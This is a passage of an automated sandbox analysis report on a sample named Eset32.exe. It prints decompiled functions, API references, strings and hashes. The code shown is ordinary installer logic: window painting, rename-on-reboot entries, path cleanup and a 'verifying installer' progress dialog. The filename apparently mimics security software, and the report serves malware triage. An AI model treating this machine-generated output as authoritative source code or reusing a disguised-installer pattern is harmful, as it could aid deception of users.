                                                          0x004010a6
                                                          0x004010bd
                                                          0x004010cc
                                                          0x004010cf
                                                          0x004010d5
                                                          0x004010d9
                                                          0x004010e4
                                                          0x004010ed
                                                          0x004010ef
                                                          0x004010ef
                                                          0x00401100
                                                          0x00401105
                                                          0x0040110d
                                                          0x00401110
                                                          0x00401112
                                                          0x00401118
                                                          0x0040111f
                                                          0x00401126
                                                          0x00401130
                                                          0x00401142
                                                          0x00401156
                                                          0x00401160
                                                          0x00401165
                                                          0x00401165
                                                          0x00401110
                                                          0x0040116e
                                                          0x00000000
                                                          0x00401178
                                                          0x00401010
                                                          0x00401013
                                                          0x00401015
                                                          0x0040101f
                                                          0x0040101f
                                                          0x00000000

                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,Name Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$Name Setup
                                                          • API String ID: 941294808-4002928617
                                                          • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                          • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D66 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405D66(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C4B(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D37(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C90(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                          0x00405d66
                                                          0x00405d6f
                                                          0x00405d76
                                                          0x00405d8a
                                                          0x00405db2
                                                          0x00405dbd
                                                          0x00405dc1
                                                          0x00405de1
                                                          0x00405de8
                                                          0x00405df2
                                                          0x00405dff
                                                          0x00405e04
                                                          0x00405e09
                                                          0x00405e0d
                                                          0x00405e1c
                                                          0x00405e1e
                                                          0x00405e2b
                                                          0x00405e2f
                                                          0x00405eca
                                                          0x00000000
                                                          0x00405e45
                                                          0x00405e52
                                                          0x00405e76
                                                          0x00405e7a
                                                          0x00405e99
                                                          0x00405e9d
                                                          0x00405e9d
                                                          0x00405e9f
                                                          0x00405ea8
                                                          0x00405eb3
                                                          0x00405ebe
                                                          0x00405ec4
                                                          0x00000000
                                                          0x00405ec4
                                                          0x00405e7c
                                                          0x00405e7f
                                                          0x00405e8a
                                                          0x00405e86
                                                          0x00405e88
                                                          0x00405e89
                                                          0x00405e89
                                                          0x00405e91
                                                          0x00405e93
                                                          0x00000000
                                                          0x00405e93
                                                          0x00405e5d
                                                          0x00405e63
                                                          0x00000000
                                                          0x00405e63
                                                          0x00405e2f
                                                          0x00405e0d
                                                          0x00405d8c
                                                          0x00405d97
                                                          0x00405da0
                                                          0x00405da4
                                                          0x00000000
                                                          0x00000000
                                                          0x00405da4
                                                          0x00405ed5

                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                          • GetShortPathNameA.KERNEL32 ref: 00405DA0
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          • GetShortPathNameA.KERNEL32 ref: 00405DBD
                                                          • wsprintfA.USER32 ref: 00405DDB
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                          • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                          • GlobalFree.KERNEL32 ref: 00405EC4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %s=%s$[Rename]
                                                          • API String ID: 2171350718-1727408572
                                                          • Opcode ID: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
                                                          • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                          • Opcode Fuzzy Hash: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
                                                          • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004063D2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004063D2(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                          0x004063d4
                                                          0x004063dc
                                                          0x004063f0
                                                          0x004063f0
                                                          0x004063f6
                                                          0x00406403
                                                          0x00406403
                                                          0x00406404
                                                          0x00406406
                                                          0x0040640a
                                                          0x0040640c
                                                          0x00406415
                                                          0x00406417
                                                          0x00406431
                                                          0x00406439
                                                          0x00406439
                                                          0x0040643e
                                                          0x00406440
                                                          0x00406442
                                                          0x00406446
                                                          0x00406447
                                                          0x0040644a
                                                          0x00406452
                                                          0x00406454
                                                          0x00406458
                                                          0x00000000
                                                          0x00000000
                                                          0x0040645e
                                                          0x00406463
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406463
                                                          0x00406468

                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Eset32.exe" ,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\Eset32.exe" ,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                          • CharPrevA.USER32(?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                          • *?|<>/":, xrefs: 0040641A
                                                          • "C:\Users\user\Desktop\Eset32.exe" , xrefs: 0040640E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-662819925
                                                          • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                          • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004041E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                          0x004041f4
                                                          0x004042aa
                                                          0x00000000
                                                          0x004042aa
                                                          0x00404205
                                                          0x00404209
                                                          0x00000000
                                                          0x00404223
                                                          0x00404223
                                                          0x0040422c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040422e
                                                          0x0040423a
                                                          0x0040423d
                                                          0x0040423d
                                                          0x00404243
                                                          0x00404249
                                                          0x00404249
                                                          0x00404255
                                                          0x0040425b
                                                          0x00404262
                                                          0x00404265
                                                          0x00404268
                                                          0x0040426a
                                                          0x0040426a
                                                          0x00404272
                                                          0x00404278
                                                          0x00404278
                                                          0x00404282
                                                          0x00404287
                                                          0x0040428a
                                                          0x0040428f
                                                          0x00404292
                                                          0x00404292
                                                          0x004042a2
                                                          0x004042a2
                                                          0x00000000
                                                          0x004042a5

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040521E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040521E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                          0x00405224
                                                          0x00405230
                                                          0x00405233
                                                          0x00405239
                                                          0x00405245
                                                          0x00405248
                                                          0x0040524b
                                                          0x00405251
                                                          0x00405251
                                                          0x00405257
                                                          0x0040525f
                                                          0x00405262
                                                          0x0040527f
                                                          0x00405283
                                                          0x0040528c
                                                          0x0040528c
                                                          0x00405296
                                                          0x0040529f
                                                          0x004052ab
                                                          0x004052b2
                                                          0x004052b6
                                                          0x004052b9
                                                          0x004052cc
                                                          0x004052da
                                                          0x004052da
                                                          0x004052de
                                                          0x004052e0
                                                          0x004052e3
                                                          0x00000000
                                                          0x004052e3
                                                          0x00405264
                                                          0x0040526c
                                                          0x00405274
                                                          0x0040527a
                                                          0x00000000
                                                          0x0040527a
                                                          0x00405274
                                                          0x00405262
                                                          0x004052ed

                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • lstrlenA.KERNEL32(00403233,0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00428145,76DDEA30), ref: 0040527A
                                                          • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • SendMessageA.USER32 ref: 004052B2
                                                          • SendMessageA.USER32 ref: 004052CC
                                                          • SendMessageA.USER32 ref: 004052DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
                                                          • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                          • Opcode Fuzzy Hash: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
                                                          • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404ACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                          0x00404adc
                                                          0x00404ae9
                                                          0x00404aef
                                                          0x00404b2d
                                                          0x00404b2d
                                                          0x00404b3c
                                                          0x00404b43
                                                          0x00000000
                                                          0x00404b45
                                                          0x00404af1
                                                          0x00404b00
                                                          0x00404b08
                                                          0x00404b0b
                                                          0x00404b1d
                                                          0x00404b23
                                                          0x00404b2a
                                                          0x00000000
                                                          0x00404b2a
                                                          0x00000000

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402DBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x3f0998
					_t11 =  *0x42944c; // 0x3f2b9c
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                          0x00402dc7
                                                          0x00402dd5
                                                          0x00402ddb
                                                          0x00402ddb
                                                          0x00402de9
                                                          0x00402deb
                                                          0x00402df1
                                                          0x00402df8
                                                          0x00402dfa
                                                          0x00402dfa
                                                          0x00402e10
                                                          0x00402e20
                                                          0x00402e32
                                                          0x00402e32
                                                          0x00402e3a

                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                          • MulDiv.KERNEL32(003F0998,00000064,003F2B9C), ref: 00402E00
                                                          • wsprintfA.USER32 ref: 00402E10
                                                          • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                          • SetDlgItemTextA.USER32 ref: 00402E32
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                          • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
